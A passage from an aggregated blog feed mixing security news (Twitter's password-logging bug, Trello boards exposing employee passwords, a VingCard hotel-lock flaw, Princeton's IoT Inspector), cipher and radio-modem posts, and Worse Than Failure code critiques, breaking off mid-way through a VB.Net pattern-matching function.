  • Keep methods with escalated permissions as simple as possible. Remember that these things are dangerous and should be as easy to understand as possible.
  • Calculate paths to manipulate inside the escalated method — so, don’t let someone pass in a full path and the contents to write to that file as root, instead let them pass in the name of the network interface or whatever that you are manipulating and then calculate the path from there. That will make it harder for callers to use your code to clobber random files on the system.

Adding new code with escalated permissions is really easy in Nova now, and much more secure and faster than it was when we only had sudo and root command lines to do these sorts of things. Let me know if you have any questions.

Share

The post How to make a privileged call with oslo privsep appeared first on Made by Mikal.

Krebs on SecurityTwitter to All Users: Change Your Password Now!

Twitter just asked all 300+ million users to reset their passwords, citing the exposure of user passwords via a bug that stored passwords in plain text — without protecting them with any sort of encryption technology that would mask a Twitter user’s true password. The social media giant says it has fixed the bug and that so far its investigation hasn’t turned up any signs of a breach or that anyone misused the information. But if you have a Twitter account, please change your account password now.

Or if you don’t trust links in blogs like this (I get it) go to Twitter.com and change it from there. And then come back and read the rest of this. We’ll wait.

In a post to its company blog this afternoon, Twitter CTO Parag Agrawal wrote:

“When you set a password for your Twitter account, we use technology that masks it so no one at the company can see it. We recently identified a bug that stored passwords unmasked in an internal log. We have fixed the bug, and our investigation shows no indication of breach or misuse by anyone.

A message posted this afternoon (and still present as a pop-up) warns all users to change their passwords.

“Out of an abundance of caution, we ask that you consider changing your password on all services where you’ve used this password. You can change your Twitter password anytime by going to the password settings page.”

Agrawal explains that Twitter normally masks user passwords through a state-of-the-art encryption technology called “bcrypt,” which replaces the user’s password with a random set of numbers and letters that are stored in Twitter’s system.

“This allows our systems to validate your account credentials without revealing your password,” said Agrawal, who says the technology they’re using to mask user passwords is the industry standard.

“Due to a bug, passwords were written to an internal log before completing the hashing process,” he continued. “We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again.”

Agrawal wrote that while Twitter has no reason to believe password information ever left Twitter’s systems or was misused by anyone, the company is still urging all Twitter users to reset their passwords NOW.

A letter to all Twitter users posted by Twitter CTO Parag Agrawal

Twitter advises:
-Change your password on Twitter and on any other service where you may have used the same password.
-Use a strong password that you don’t reuse on other websites.
Enable login verification, also known as two factor authentication. This is the single best action you can take to increase your account security.
-Use a password manager to make sure you’re using strong, unique passwords everywhere.

This may be much ado about nothing disclosed out of an abundance of caution, or further investigation may reveal different findings. It doesn’t matter for right now: If you’re a Twitter user and if you didn’t take my advice to go change your password yet, go do it now! That is, if you can.

Twitter.com seems responsive now, but some period of time Thursday afternoon Twitter had problems displaying many Twitter profiles, or even its homepage. Just a few moments ago, I tried to visit the Twitter CTO’s profile page and got this (ditto for Twitter.com):

What KrebsOnSecurity and other Twitter users got when we tried to visit twitter.com and the Twitter CTO’s profile page late in the afternoon ET on May 3, 2018.

If for some reason you can’t reach Twitter.com, try again soon. Put it on your to-do list or calendar for an hour from now. Seriously, do it now or very soon.

And please don’t use a password that you have used for any other account you use online, either in the past or in the present. A non-comprehensive list (note to self) of some password tips are here.

I have sent some more specific questions about this incident in to Twitter. More updates as available.

Update, 8:04 p.m. ET: Went to reset my password at Twitter and it said my new password was strong, but when I submitted it I was led to a dead page. But after logging in again at twitter.com the new password worked (and the old didn’t anymore). Then it prompted me to enter one-time code from app (you do have 2-factor set up on Twitter, right?) Password successfully changed!

Rondam RamblingsA quantum mechanics puzzle

Time to take a break from politics and sociology and geek out about quantum mechanics for a while. Consider a riff on a Michelson-style interferometer that looks like this: A source of laser light shines on a half-silvered mirror angled at 45 degrees (the grey rectangle).  This splits the beam in two.  The two beams are in actuality the same color as the original, but I've drawn them in

Google AdsenseUpdated impressions metrics for AdSense

Reporting plays a key role in the AdSense experience. In fact, two-thirds of our partners consider it the most important feature within AdSense. Helping partners understand and improve their performance metrics is a top priority. Today, we’re announcing updates to how we report AdSense impressions.

The Interactive Advertising Bureau (IAB) and the Media Rating Council (MRC) in partnership with other industry bodies such as the Mobile Marketing Association (MMA), periodically review and update industry standards for impression measurement. They recommend guidelines to standardize how impressions are counted across formats and platforms.

What’s changing? 
Over the last year, to remain consistent with these standards, we have transitioned our ad serving platforms from served impressions to downloaded impressions. Served impressions are counted at the point that we find an ad for an ad request on the server. Downloaded impressions are counted for each ad request once at least one of the returned ads has begun to load on the user’s device. Starting today, publishers will see updated metrics in AdSense that reflect this change.
How will it impact partners?
Switching to counting impressions on download helps to improve viewability rates, consistency across measurement providers, and aligns the impression metric better with advertiser value. For example, if an ad failed to download or if the user closed the tab before it arrived, it will no longer be counted as an impression. As a result, some AdSense users might see decreases in their impression counts, and corresponding improvements in their impression RPM, CTR, and other impression-based metrics. Your earnings, however, should not be impacted.

We will continue to review and update our impression counting technology as new industry standards are defined and implemented.

For more information please visit our Help Center.

Posted by:
Andrew Gildfind, Product Manager

Cory DoctorowAnnouncing “Petard,” a new science fiction story reading on my podcast

Here’s the first part of my reading (MP3) of Petard, a story from MIT Tech Review’s Twelve Tomorrows, edited by Bruce Sterling; a story inspired by, and dedicated to, Aaron Swartz — about elves, Net Neutrality, dorms and the collective action problem.

MP3

Mark ShuttleworthScam alert

Am writing briefly to say that I believe a scam or pyramid scheme is currently using my name fraudulently in South Africa. I am not going to link to the websites in question here, but if you are being pitched a make-money-fast story that refers to me and crypto-currency, you are most likely being targeted by fraudsters.

CryptogramLC4: Another Pen-and-Paper Cipher

Interesting symmetric cipher: LC4:

Abstract: ElsieFour (LC4) is a low-tech cipher that can be computed by hand; but unlike many historical ciphers, LC4 is designed to be hard to break. LC4 is intended for encrypted communication between humans only, and therefore it encrypts and decrypts plaintexts and ciphertexts consisting only of the English letters A through Z plus a few other characters. LC4 uses a nonce in addition to the secret key, and requires that different messages use unique nonces. LC4 performs authenticated encryption, and optional header data can be included in the authentication. This paper defines the LC4 encryption and decryption algorithms, analyzes LC4's security, and describes a simple appliance for computing LC4 by hand.

Almost two decades ago I designed Solitaire, a pen-and-paper cipher that uses a deck of playing cards to store the cipher's state. This algorithm uses specialized tiles. This gives the cipher designer more options, but it can be incriminating in a way that regular playing cards are not.

Still, I like seeing more designs like this.

Hacker News thread.

Worse Than FailureCodeSOD: The Same Date

Oh, dates. Oh, dates in Java. They’re a bit of a dangerous mess, at least prior to Java 8. That’s why Java 8 created its own date-time libraries, and why JodaTime was the gold standard in Java date handling for many years.

But it doesn’t really matter what date handling you do if you’re TRWTF. An Anonymous submitter passed along this method, which is meant to set the start and end date of a search range, based on a number of days:

private void setRange(int days){
        DateFormat df = new SimpleDateFormat("yyyy-MM-dd")
        Date d = new Date();
        Calendar c = Calendar.getInstance()
        c.setTime(d);

        Date start =  c.getTime();

        if(days==-1){
                c.add(Calendar.DAY_OF_MONTH, -1);
                assertThat(c.getTime()).isNotEqualTo(start)
        }
        else if(days==-7){
                c.add(Calendar.DAY_OF_MONTH, -7)
                assertThat(c.getTime()).isNotEqualTo(start)
        }
        else if (days==-30){
                c.add(Calendar.DAY_OF_MONTH, -30)
                assertThat(c.getTime()).isNotEqualTo(start)
        }
        else if (days==-365){
                c.add(Calendar.DAY_OF_MONTH, -365)
                assertThat(c.getTime()).isNotEqualTo(start)
        }

        from = df.format(start).toString()+"T07:00:00.000Z"
        to = df.format(d).toString()+"T07:00:00.000Z"
}

Right off the bat, days only has a handful of valid values- a day, a week, a month(ish) or a year(ish). I’m sure passing it as an int would never cause any confusion. The fact that they don’t quite grasp what variables are for is a nice touch. I’m also quite fond of how they declare a date format at the top, but then also want to append a hard-coded timezone to the format, which again, I’m sure will never cause any confusion or issues. The assertThat calls check that the Calendar.add method does what it’s documented to do, making those both pointless and stupid.

But that’s all small stuff. The real magic is that they never actually use the calendar after adding/subtracting dates. They obviously meant to include d = c.getTime() someplace, but forgot. Then, without actually testing the code (they have so many asserts, why would they need to test?) they checked it in. It wasn’t until QA was checking the prerelease build that anyone noticed, “Hey, filtering by dates doesn’t work,” and an investigation revealed that from and to always had the same value.

[Advertisement] Forget logs. Next time you're struggling to replicate error, crash and performance issues in your apps - Think Raygun! Installs in minutes. Learn more.

,

Krebs on SecurityWhen Your Employees Post Passwords Online

Storing passwords in plaintext online is never a good idea, but it’s remarkable how many companies have employees who are doing just that using online collaboration tools like Trello.com. Last week, KrebsOnSecurity notified a host of companies that employees were using Trello to share passwords for sensitive internal resources. Among those put at risk by such activity included an insurance firm, a state government agency and ride-hailing service Uber.

By default, Trello boards for both enterprise and personal use are set to either private (requires a password to view the content) or team-visible only (approved members of the collaboration team can view).

But that doesn’t stop individual Trello users from manually sharing personal boards that include proprietary employer data, information that may be indexed by search engines and available to anyone with a Web browser. And unfortunately for organizations, far too many employees are posting sensitive internal passwords and other resources on their own personal Trello boards that are left open and exposed online.

A personal Trello board created by an Uber employee included passwords that might have exposed sensitive internal company operations.

KrebsOnSecurity spent the past week using Google to discover unprotected personal Trello boards that listed employer passwords and other sensitive data. Pictured above was a personal board set up by some Uber developers in the company’s Asia-Pacific region, which included passwords needed to view a host of internal Google Documents and images.

Uber spokesperson Melanie Ensign said the Trello board in question was made private shortly after being notified by this publication, among others. Ensign said Uber found the unauthorized Trello board exposed information related to two users in South America who have since been notified.

“We had a handful of members in random parts of the world who didn’t realize they were openly sharing this information,” Ensign said. “We’ve reached out to these teams to remind people that these things need to happen behind internal resources. Employee awareness is an ongoing challenge, We may have dodged a bullet here, and it definitely could have been worse.”

Ensign said the initial report about the exposed board came through the company’s bug bounty program, and that the person who reported it would receive at least the minimum bounty amount — $500 — for reporting the incident (Uber hasn’t yet decided whether the award should be higher for this incident).

The Uber employees who created the board “used their work email to open a public board that they weren’t supposed to,” Ensign said. “They didn’t go through our enterprise account to create that. We first found out about it through our bug bounty program, and while it’s not technically a vulnerability in our products, it’s certainly something that we would pay for anyway. In this case, we got multiple reports about the same thing, but we always pay the first report we get.”

Of course, not every company has a bug bounty program to incentivize the discovery and private reporting of internal resources that may be inadvertently exposed online.

Screenshots that KrebsOnSecurity took of many far more shocking examples of employees posting dozens of passwords for sensitive internal resources are not pictured here because the affected parties still have not responded to alerts provided by this author.

Trello is one of many online collaboration tools made by Atlassian Corporation PLC, a technology company based in Sydney, Australia. Trello co-founder Michael Pryor said Trello boards are set to private by default and must be manually changed to public by the user.

“We strive to make sure public boards are being created intentionally and have built in safeguards to confirm the intention of a user before they make a board publicly visible,” Pryor said. “Additionally, visibility settings are displayed persistently on the top of every board.”

If a board is Team Visible it means any members of that team can view, join, and edit cards. If a board is Private, only members of that specific board can see it. If a board is Public, anyone with the link to the board can see it.

Interestingly, updates made to Trello’s privacy policy over the past weekend may make it easier for companies to locate personal boards created by employees and pull them behind company resources.

A Trello spokesperson said the privacy changes were made to bring the company’s policies in line with new EU privacy laws that come into enforcement later this month. But they also clarify that Trello’s enterprise features allow the enterprise admins to control the security and permissions around a work account an employee may have created before the enterprise product was purchased.

Uber spokesperson Ensign called the changes welcome.

“As a result companies will have more security control over Trello boards created by current/former employees and contractors, so we’re happy to see the change,” she said.

KrebsOnSecurity would like to thank security researcher Kushagra Pathak for the heads up about the unauthorized Uber board. Pathak has posted his own account of the discovery here.

Update: Added information from Ensign about two users who had their data exposed from the credentials in the unauthorized Trello page published by Uber employees.

Rondam RamblingsThis is inspiring

The Washington Post reports that: Two African American men arrested at a Philadelphia Starbucks last month have reached a settlement with the city and secured its commitment to a pilot program for young entrepreneurs.  Rashon Nelson and Donte Robinson chose not to pursue a lawsuit against the city, Mike Dunn, a spokesman from the Mayor’s Office, told The Washington Post. Instead, they agreed to

TEDCalling all social entrepreneurs + nonprofit leaders: Apply for The Audacious Project

Our first collection of Audacious Project winners takes the stage after a stellar session at TED2018, in which each winner made a big, big wish to move their organization’s vision to the next level with help from a new consortium of nonprofits. As a bonus during the Audacious Project session. we watched an astonishing performance of “New Second Line” from Camille A. Brown and Dancers. From left: The Bail Project’s Robin Steinberg; Heidi M. Sosik of the Woods Hole Oceanographic Institute; Caroline Harper of Sight Savers; Vanessa Garrison and T. Morgan Dixon of GirlTrek; Fred Krupp from the Environmental Defense Fund; Chloe Davis and Maleek Washington of Camille A. Brown and Dancers; pianist Scott Patterson; Andrew Youn of the One Acre Fund; and Catherine Foster, Camille A. Brown, Timothy Edwards, Juel D. Lane from Camille A. Brown and Dancers. Obscured behind Catherine Foster is Raj Panjabi of Last Mile Health (and dancer Mayte Natalio is offstage). Photo: Ryan Lash / TED

Creating wide-scale change isn’t easy. It takes incredible passion around an issue, and smart ideas on how to move the needle and, hopefully, improve people’s lives. It requires bottomless energy, a dedicated team, an extraordinary amount of hope. And, of course, it demands real resources.

TED would like to help, on the last part at least. This is an open invitation to all social entrepreneurs and nonprofit leaders: apply to be a part of The Audacious Project in 2019. We’re looking for big, bold, unique ideas that are capable of affecting more than a million people or driving transformational change on a key issue. We’re looking for unexplored plans that have a real, credible path to execution. That can inspire people around the world to come together to act.

Applications for The Audacious Project are open now through June 10. And here’s the best part — this isn’t a long, detailed grant application that will take hours to complete. We’ve boiled it down to the essential questions that can be answered swiftly. So apply as soon as you can. If your idea feels like a good fit, we’ll be in touch with an extended application that you’ll have four weeks to complete.

The Audacious Project process is rigorous — if selected as a Finalist, you’ll participate in an ideation workshop to help clarify your approach and work with us and our partners on a detailed project proposal spanning three to five years. But the work will be worth it, as it can turbocharge your drive toward change.

More than $406 million has already been committed to the first ideas in The Audacious Project. And further support is coming in following the simultaneous launch of the project at both TED2018 and the annual Skoll World Forum last week. Watch the full session from TED, or highlight reel above that screened the next day at Skoll. And who knows? Perhaps you’ll be a part of the program in 2019.

CryptogramNIST Issues Call for "Lightweight Cryptography" Algorithms

This is interesting:

Creating these defenses is the goal of NIST's lightweight cryptography initiative, which aims to develop cryptographic algorithm standards that can work within the confines of a simple electronic device. Many of the sensors, actuators and other micromachines that will function as eyes, ears and hands in IoT networks will work on scant electrical power and use circuitry far more limited than the chips found in even the simplest cell phone. Similar small electronics exist in the keyless entry fobs to newer-model cars and the Radio Frequency Identification (RFID) tags used to locate boxes in vast warehouses.

All of these gadgets are inexpensive to make and will fit nearly anywhere, but common encryption methods may demand more electronic resources than they possess.

The NSA's SIMON and SPECK would certainly qualify.

Worse Than FailureCodeSOD: A Password Generator

Every programming language has a *bias* which informs their solutions. Object-oriented languages are biased towards objects, and all the things which follow on. Clojure is all about function application. Haskell is all about type algebra. Ruby is all about monkey-patching existing objects.

In any language, these things can be taken too far. Java's infamous Spring framework leaps to mind. Perl, being biased towards regular expressions, has earned its reputation as being "write only" thanks to regex abuse.

Gert sent us along some Perl code, and I was expecting to see regexes taken too far. To my shock, there weren't any regexes.

Gert's co-worker needed to generate a random 6-digit PIN for a voicemail system. It didn't need to be cryptographically secure, repeats and zeros are allowed (they exist on a keypad, after all!). The Perl-approach for doing this would normally be something like:


sub randomPIN {
  return sprintf("%06u",int(rand(1000000)));
}

Gert's co-worker had a different plan in mind, though.


sub randomPIN {
my $password;
my @num = (1..9);
my @char = ('@','#','$','%','^','&','*','(',')');
my @alph = ('a'..'z');
my @alph_up = ('A'..'Z');

my $rand_num1 = $num[int rand @num];
my $rand_num2 = $num[int rand @num];
my $rand_num3 = $num[int rand @num];
my $rand_num4 = $num[int rand @num];
my $rand_num5 = $num[int rand @num];
my $rand_num6 = $num[int rand @num];

$password = "$rand_num1"."$rand_num2"."$rand_num3"."$rand_num4"."$rand_num5"."$rand_num6";

return $password;
}

This code starts by creating a set of arrays, @num, @char, etc. The only one that matters is @num, though, since this generates a PIN to be entered on a phone keypad and touchtone signals are numeric and also there is no "(" key on a telephone keypad. Obviously, the developer copied this code from a random password function somewhere, which is its own special kind of awful.

Now, what's fascinating is that they initialize @num with the numbers 1 through 9, and then use the rand function to generate a random number from 0 through 8, so that they can select an item from the array. So they understood how the rand function worked, but couldn't make the leap to eliminate the array with something like rand(9).

For now, replacing this function is simply on Gert's todo list.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

,

CryptogramIoT Inspector Tool from Princeton

Researchers at Princeton University have released IoT Inspector, a tool that analyzes the security and privacy of IoT devices by examining the data they send across the Internet. They've already used the tool to study a bunch of different IoT devices. From their blog post:

Finding #3: Many IoT Devices Contact a Large and Diverse Set of Third Parties

In many cases, consumers expect that their devices contact manufacturers' servers, but communication with other third-party destinations may not be a behavior that consumers expect.

We have found that many IoT devices communicate with third-party services, of which consumers are typically unaware. We have found many instances of third-party communications in our analyses of IoT device network traffic. Some examples include:

  • Samsung Smart TV. During the first minute after power-on, the TV talks to Google Play, Double Click, Netflix, FandangoNOW, Spotify, CBS, MSNBC, NFL, Deezer, and Facebook­even though we did not sign in or create accounts with any of them.

  • Amcrest WiFi Security Camera. The camera actively communicates with cellphonepush.quickddns.com using HTTPS. QuickDDNS is a Dynamic DNS service provider operated by Dahua. Dahua is also a security camera manufacturer, although Amcrest's website makes no references to Dahua. Amcrest customer service informed us that Dahua was the original equipment manufacturer.

  • Halo Smoke Detector. The smart smoke detector communicates with broker.xively.com. Xively offers an MQTT service, which allows manufacturers to communicate with their devices.

  • Geeni Light Bulb. The Geeni smart bulb communicates with gw.tuyaus.com, which is operated by TuYa, a China-based company that also offers an MQTT service.

We also looked at a number of other devices, such as Samsung Smart Camera and TP-Link Smart Plug, and found communications with third parties ranging from NTP pools (time servers) to video storage services.

Their first two findings are that "Many IoT devices lack basic encryption and authentication" and that "User behavior can be inferred from encrypted IoT device traffic." No surprises there.

Boingboing post.

Related: IoT Hall of Shame.

Worse Than FailureAn Obvious Requirement

Requirements. That magical set of instructions that tell you specifically what you need to build and test. Users can't be bothered to write them, and even if they could, they have no idea how to tell you what they want. It doesn't help that many developers are incapable of following instructions since they rarely exist, and when they do, they usually aren't worth the coffee-stained napkin upon which they're scribbled.

A sign warning that a footpath containing stairs isn't suitable for wheelchairs

That said, we try our best to build what we think our users need. We attempt to make it fairly straightforward to use what we build. The button marked Reports most likely leads to something to do with generating/reading/whatever-ing reports. Of course, sometimes a particular feature is buried several layers deep and requires multiple levels of ribbons, menus, sub-menus, dialogs, sub-dialogs and tabs before you find the checkbox you want. Since us developers as a group are, by nature, somewhat anal retentive, we try to keep related features grouped so that you can generally guess what path to try to find something. And we often supply a Help feature to tell you how to find it when you can't.

Of course, some people simply cannot figure out how to use the software we build, no matter how sensibly it's laid out and organized, or how many hints and help features we provide. And there is nothing in the history of computer science that addresses how to change this. Nothing!

Dimitri C. had a user who wanted a screen that performed several actions. The user provided requirements in the form of a printout of a similar dialog he had used in a previous application, along with a list of changes/colors/etc. They also provided some "helpful" suggestions, along the lines of, "It should be totally different, but exactly the same as the current application." Dimitri took pains to organize the actions and information in appropriate hierarchical groups. He laid out appropriate controls in a sensible way on the screen. He provided a tooltip for each control and a Help button.

Shortly after delivery, a user called to complain that he couldn't find a particular feature. Dimitri asked "Have you tried using the Help button?" The user said that "I can't be bothered to read the instructions in the help tool because accessing this function should be obvious".

Dimitri asked him "Have you looked on the screen for a control with the relevant name?" The user complained that "There are too many controls, and this function should be obvious". Dimitri asked "Did you try to hover your mouse over the controls to read the tooltips?" The user complained that "I don't have the time to do that because it would take too long!" (yet he had the time to complain).

Frustrated, Dimitri replied "To make that more obvious, should I make these things less obvious?". The user complained that "Everything should be obvious". Dimitri asked how that could possibly be done, to which the user replied "I don't know, that's your job".

When he realized that this user had no clue how to ask for what he wanted, he asked how this feature worked in previous programs, to which the user replied "I clicked this, then this, then this, then this, then this, then restarted the program".

Dimitri responded that "That's six steps instead of the two in my program, and that would require you to reenter some of the data".

The user responded "Yes, but it's obvious".

So is the need to introduce that type of user to the business end of a clue-bat.

[Advertisement] Ensure your software is built only once and then deployed consistently across environments, by packaging your applications and components. Learn how today!

Cory DoctorowBoston, Chicago and Waterloo, I’m heading your way!

This Wednesday at 1145am, I’ll be giving the IDE Lunch Seminar at MIT’s Sloan School of Management, 100 Main Street.


From there, I head to Chicago to keynote Thotcon on Friday at 11am.

My final stop on this trip is Waterloo’s Perimeter Institute for Theoretical Physics, May 9 at 2PM.

I hope to see you! I’ve got plenty more appearances planned this season, including Santa Fe, Phoenix, San Jose, Boston, San Diego and Pasadena!

,

Planet Linux AustraliaDavid Rowe: FreeDV 700D Part 3

After a 1 year hiatus, I am back into FreeDV 700D development, working to get the OFDM modem, LDPC FEC, and interleaver algorithms developed last year into real time operation. The aim is to get improved performance on HF channels over FreeDV 700C.

I’ve been doing lots of refactoring, algorithm development, fixing bugs, tuning, and building up layers of C code so we can get 700D on the air.

Steve ported the OFDM modem to C – thanks Steve!

I’m building up the software in the form of command line utilities, some notes, examples and specifications in Codec 2 README_ofdm.txt.

Last week I stayed at the shack of Chris, VK5CP, in a quiet rural location at Younghusband on the river Murray. As well as testing my Solar Boat, Mark (VK5QI) helped me test FreeDV 700D. This was the first time the C code software has been tested over a real HF radio channel.

We transmitted signals from YoungHusband, and received them at a remote SDR in Sydney (about 1300km away), downloading wave files of the received signal for off-line analysis.

After some tweaking, it worked! The frequency offset was a bit off, so I used the cohpsk_ch utility to shift it within the +/- 25Hz acquisition range of the FreeDV 700D demodulator. I also found some level sensitivity issues with the LDPC decoder. After implementing a form of AGC, the number of bit errors dropped by a factor of 10.

The channel had nasty fading of around 1Hz, here is a video of the “sample #32” spectrum bouncing around. This rapid fading is a huge challenge for modems. Note also the spurious birdie off to the left, and the effect of receiver AGC – the noise level rises during fades.

Here is a spectrogram of the same sample 33. The x axis is time in seconds. It’s like a “waterfall” SDR plot on it’s side. Note the heavy “barber pole” fading, which corresponds to the fades sweeping across the spectrum in the video above.

Here is the smoothed SNR estimate. The SNR is moving target for real world HF channels, the SNR moves between 2 and 6dB.

FreeDV 700D was designed to work down to 2dB on HF fading channels so pat on the back for me! Hundreds of hours of careful development and testing meant this thing actually worked when it went on air….

Sample 32 is a longer file that contains test frames instead of coded voice. The QPSK scatter diagram is a messy cross, typical of fading channels, as the amplitude of the signal moves in and out:

The LDPC FEC does a good job. Here are plots of the uncoded (raw) bit errors, and the bit errors after LDPC decoding, with the SNR estimates below:

Here are some wave and raw (headerless) audio files. The off air audio is error free, albeit at the low quality of Codec 2 at 700 bits/s. The goal of this work is to get intelligible speech through HF channels at low SNRs. We’ll look at improving the speech quality as a future step.

Still, error free digital voice on a heavily faded HF channel at 2dB SNR is pretty cool.

See below for how to use the last two raw file samples.

sample 33 off air modem signal Sample 33 decoded voice Sample 32 off air test frames raw file Sample 33 off air voice raw file

SNR estimation

After I sampled the files I had a problem – I needed to know the SNR. You see in my development I use simulated channels where I know exactly what the SNR is. I need to compare the performance of the real world, off-air signals to my expected results at a given SNR.

Unfortunately SNR on a fading channel is a moving target. In simulation I measure the total power and noise over the entire run, and the simulated fading channel is consistent. Real world channels jump all over the place as the ionosphere bounces around. Oh well, knowing we are in the ball park is probably good enough. We just need to know if FreeDV 700D is hanging onto real world HF channels at roughly the SNRs it was designed for.

I came up with a way of measuring SNR, and tested it with a range of simulated AWGN (just noise) and fading channels. The fading bandwidth is the speed at which the fading channel evolves. Slow fading channels might change at 0.2Hz, faster channels, like samples #32 and #33, at about 1Hz.

The blue line is the ideal, and on AWGN and slowly fading channels my SNR estimator does OK. It reads a dB low as the fading bandwidth increases to 1Hz. We are interested in the -2 to 4dB SNR range.

Command Lines

With the samples in the table above and codec2-dev SVN rev 3465, you can repeat some of my decodes using Octave and C:

octave:42> ofdm_ldpc_rx("32.raw")
EsNo fixed at 3.000000 - need to est from channel
Coded BER: 0.0010 Tbits: 54992 Terrs:    55
Codec PER: 0.0097 Tpkts:  1964 Terrs:    19
Raw BER..: 0.0275 Tbits: 109984 Terrs:  3021

david@penetrator:~/codec2-dev/build_linux/src$ ./ofdm_demod ../../octave/32.raw /dev/null -t --ldpc
Warning EsNo: 3.000000 hard coded
BER......: 0.0246 Tbits: 116620 Terrs:  2866
Coded BER: 0.0009 Tbits: 54880 Terrs:    47

build_linux/src$ ./freedv_rx 700D ../../octave/32.raw /dev/null --testframes
BER......: 0.0246 Tbits: 116620 Terrs:  2866
Coded BER: 0.0009 Tbits: 54880 Terrs:    47

build_linux/src$ ./freedv_rx 700D ../../octave/33.raw  - | aplay -f S16

Next Steps

I’m working steadily towards integrating FreeDV 700D into the FreeDV GUI program so anyone can try it. This will be released in May 2018.

Reading Further

Towards FreeDV 700D
FreeDV 700D – First Over The Air Tests
Steve Ports an OFDM modem from Octave to C
Codec 2 README_ofdm.txt

CryptogramSecurity Vulnerabilities in VingCard Electronic Locks

Researchers have disclosed a massive vulnerability in the VingCard eletronic lock system, used in hotel rooms around the world:

With a $300 Proxmark RFID card reading and writing tool, any expired keycard pulled from the trash of a target hotel, and a set of cryptographic tricks developed over close to 15 years of on-and-off analysis of the codes Vingcard electronically writes to its keycards, they found a method to vastly narrow down a hotel's possible master key code. They can use that handheld Proxmark device to cycle through all the remaining possible codes on any lock at the hotel, identify the correct one in about 20 tries, and then write that master code to a card that gives the hacker free reign to roam any room in the building. The whole process takes about a minute.

[...]

The two researchers say that their attack works only on Vingcard's previous-generation Vision locks, not the company's newer Visionline product. But they estimate that it nonetheless affects 140,000 hotels in more than 160 countries around the world; the researchers say that Vingcard's Swedish parent company, Assa Abloy, admitted to them that the problem affects millions of locks in total. When WIRED reached out to Assa Abloy, however, the company put the total number of vulnerable locks somewhat lower, between 500,000 and a million.

Patching is a nightmare. It requires updating the firmware on every lock individually.

And the researchers speculate whether or not others knew of this hack:

The F-Secure researchers admit they don't know if their Vinguard attack has occurred in the real world. But the American firm LSI, which trains law enforcement agencies in bypassing locks, advertises Vingcard's products among those it promises to teach students to unlock. And the F-Secure researchers point to a 2010 assassination of a Palestinian Hamas official in a Dubai hotel, widely believed to have been carried out by the Israeli intelligence agency Mossad. The assassins in that case seemingly used a vulnerability in Vingcard locks to enter their target's room, albeit one that required re-programming the lock. "Most probably Mossad has a capability to do something like this," Tuominen says.

Slashdot post.

Worse Than FailureCodeSOD: Philegex

Last week, I was doing some graphics programming without a graphics card. It was low resolution, so I went ahead and re-implemented a few key methods from the Open GL Shader Language in a fashion which was compatible with NumPy arrays. Lucky for me, I was able to draw off many years of experience, I understood both technologies, and they both have excellent documentation which made it easy. After dozens of lines of code, I was able to whip up some pretty flexible image generator functions. I knew the tools I needed, I understood how they worked, and while I was reinventing a wheel, I had a very specific reason.

Philemon Eichin sends us some code from a point in his career where none of these things were true.

Philemon was building a changelog editor. As such, he wanted an easy, flexible way to identify patterns in the text. Philemon knew that there was something that could do that job, but he didn’t know what it was called or how it was supposed to work. So, like all good programmers, Philemon went ahead and coded up what he needed- he invented his own regular expression language, and built his own parser for it.

Thus was born Philegex. Philemon knew that regexes involved slashes, so in his language you needed to put a slash in front of every character you wanted to match exactly. He knew that it involved question marks, so he used the question mark as a wildcard which could match any character. That left the ’|" character to be optional.

So, for example: /P/H/I/L/E/G/E/X|??? would match “PHILEGEX!!!” or “PHILEGEWTF”. A date could be described as: nnnn/.nn/.nn. (YYYY.MM.DD or YYYY.DD.MM)

Living on his own isolated island without access to the Internet to attempt to google up “How to match patterns in text”, Philemon invented his own language for describing parts of a regular expression. This will be useful to interpret the code below.

PhilegexRegex
MaskableMatches
p1 Pattern / Regex
Block(s)Token(s)
CT CharType
SplitLineParseRegex
CC currentChar
auf_zu openParenthesis
Chars CharClassification

With the preamble out of the way, enjoy Philemon’s approach to regular expressions, implemented elegantly in VB.Net.

Public Class Textmarker
    Const Datum As String = "nn/.nn/.nnnn"

    Private Structure Blocks
        Dim Type As Chars
        Dim Multi As Boolean
        Dim Mode As Char_Mode
        Dim Subblocks() As Blocks
        Dim passed As Boolean
        Dim _Optional As Boolean
    End Structure



    Public Shared Function IsMaskable(p1 As String, Content As String) As Boolean
        Dim ID As Integer = 0
        Dim p2 As Chars
        Dim _Blocks() As Blocks = SplitLine(p1)
        For i As Integer = 0 To Content.Length - 1
            p2 = GetCT(Content(i))
START_CASE:
            '#If CONFIG = "Debug" Then
            '            If ID = 2 Then
            '                Stop
            '            End If

            '#End If
            If ID > _Blocks.Length - 1 Then
                Return False
            End If
            Select Case _Blocks(ID).Mode
                Case Char_Mode._Char
                    If p2.Char_V = _Blocks(ID).Type.Char_V Then
                        _Blocks(ID).passed = True
                        If Not _Blocks(ID).Multi = True Then ID += 1
                        Exit Select
                    Else
                        If _Blocks(ID).passed = True And _Blocks(ID).Multi = True Then
                            ID += 1
                            GoTo START_CASE
                        Else
                            If Not _Blocks(ID)._Optional Then Return False

                        End If
                    End If
                Case Char_Mode.Type
                    If _Blocks(ID).Type.Type = Chartypes.any Then
                        _Blocks(ID).passed = True
                        If Not _Blocks(ID).Multi = True Then ID += 1
                        Exit Select
                    Else


                        If p2.Type = _Blocks(ID).Type.Type Then
                            _Blocks(ID).passed = True
                            If Not _Blocks(ID).Multi = True Then ID += 1
                            Exit Select
                        Else
                            If _Blocks(ID).passed = True And _Blocks(ID).Multi = True Then
                                ID += 1
                                GoTo START_CASE
                            Else
                                If _Blocks(ID)._Optional Then
                                    ID += 1
                                    _Blocks(ID - 1).passed = True
                                Else
                                    Return False

                                End If

                            End If
                        End If

                    End If


            End Select


        Next
        For i = ID To _Blocks.Length - 1
            If _Blocks(ID)._Optional = True Then
                _Blocks(ID).passed = True
            Else
                Exit For
            End If
        Next
        If _Blocks(_Blocks.Length - 1).passed Then
            Return True
        Else
            Return False
        End If

    End Function

    Private Shared Function GetCT(Char_ As String) As Chars

        If "0123456789".Contains(Char_) Then Return New Chars(Char_, 2)
        If "qwertzuiopüasdfghjklöäyxcvbnmß".Contains((Char.ToLower(Char_))) Then Return New Chars(Char_, 1)
        Return New Chars(Char_, 4)
    End Function


    Private Shared Function SplitLine(ByVal Line As String) As Blocks()
        Dim ret(0) As Blocks
        Dim retID As Integer = -1
        Dim CC As Char
        For i = 0 To Line.Length - 1
            CC = Line(i)
            Select Case CC
                Case "("
                    ReDim Preserve ret(retID + 1)
                    retID += 1
                    Dim ii As Integer = i + 1
